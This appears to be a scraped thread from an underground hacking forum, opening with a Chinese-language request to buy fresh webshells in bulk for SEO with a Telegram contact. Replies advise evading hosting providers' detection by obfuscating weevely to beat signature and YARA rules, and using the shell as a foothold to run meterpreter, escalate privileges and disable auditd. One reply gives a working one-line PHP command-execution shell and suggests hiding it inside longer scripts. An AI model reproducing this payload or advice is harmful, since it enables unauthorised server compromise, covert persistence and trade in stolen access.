我为 seo 买壳
需要大量的 webshell
每天都需要 webshell
有的话可以私信我。
只为新鲜付款
多买贝壳,价格高,联系我
电报:@wokingin
需要大量的 webshell
每天都需要 webshell
有的话可以私信我。
只为新鲜付款
多买贝壳,价格高,联系我
电报:@wokingin
-
XSS.stack #1 – первый литературный журнал от юзеров форума
I need a lot of shell
- Автор темы mesahjarod52
- Дата начала
tg?
Шеллы давно перестали быть актуальными, их автоматом находит практически каждый хостинг и сносит так же мгновенно.
Как альтернатива, иди cpanel, или те же cpanel с пролитыми на них файлами, которыми могут быть как раз сами шеллы.
Как альтернатива, иди cpanel, или те же cpanel с пролитыми на них файлами, которыми могут быть как раз сами шеллы.
I remain optimistic that with the right modifications and optimizations things like weevely (https://github.com/epinna/weevely3) could be made to beat even the most paranoid yara rules even if specifically designed to detect it.
Sorry for the offtopic, have you had any success in the wild? Last time I played around with this tool it was always detected and removed.
The only workaround I found is, if possible, to whitelist the path where shell gets uploaded into.
Whether for better or worse the truth is I am not currently active so I honestly don't know. It is a disadvantage to dabble in security and not actually hack. :/
Anyway I would work to change the code and increase randomness in each place you can, or use a php obfuscator. Better yet, it should be discovered how a hosting provider detects web shells and then tailor your approach to that. You should be able to beat the signature matching tools (https://github.com/emposha/PHP-Shell-Detector) very easily even just default weevely should defeat that, and defeat YARA type (https://medium.com/@p.matkovski/yara-for-heavily-scrambled-web-shell-fcc3f8f955dc) by mixing up the primitives used - tailor to their method of detection and use different commands and frequency (requires changing weevely)... however you will be shit out of luck for someone using proper system limiting software or even linux auditd to watch syscalls and if you just do normal webshell stuff you'll still be visible. Even trying to chain with resources you find like https://gtfobins.github.io/ will just add layers but the ultimate actions will still be visible. That's just a problem (for attackers) with syscall monitoring defenses. (This is why I don't spend time on the evasion I refer to, because ultimately syscall will be seen and unless you have full solutions, sometimes it's just no good to spend time on it).
The only good use for a web shell in my opinion (which I don't share often because I'm not sure I want the unwashed masses to wake up to this or not) is to get that initial foothold (or emergency backup foothold) which is then leveraged to deploy userspace code which then immediately can try to elevate privileges (or even to kernel space) and then with that full degree of control to implant as desired and do what is needed (in context of this discussion, that would include disabling or setting trapdoors to the auditd or other monitoring if it's done on the same host). Poking around in a webshell for sake of it is silly when you could instead use it to run meterpreter and better yet focus on pivoting out of the sandbox to actually root the box. (guess I'm oldschool on that)
To the original poster, getting "lot of shell" - are you sure you need that, or won't residential proxies cover it?
There is also very short "shell" that can even be embeded in other longer php scripts as cover. The code need only include
and since that can be written different ways is virtually impossble to have a signature for. The bottom line will be the HIPS and syscall monitoring, but short things like this can ensure you get a turn in the game.
PHP:
<?=`$_GET[z]`?>
You should checkout: https://github.com/hackerschoice/gsocket it's a really great shell with great measures to stay hidden.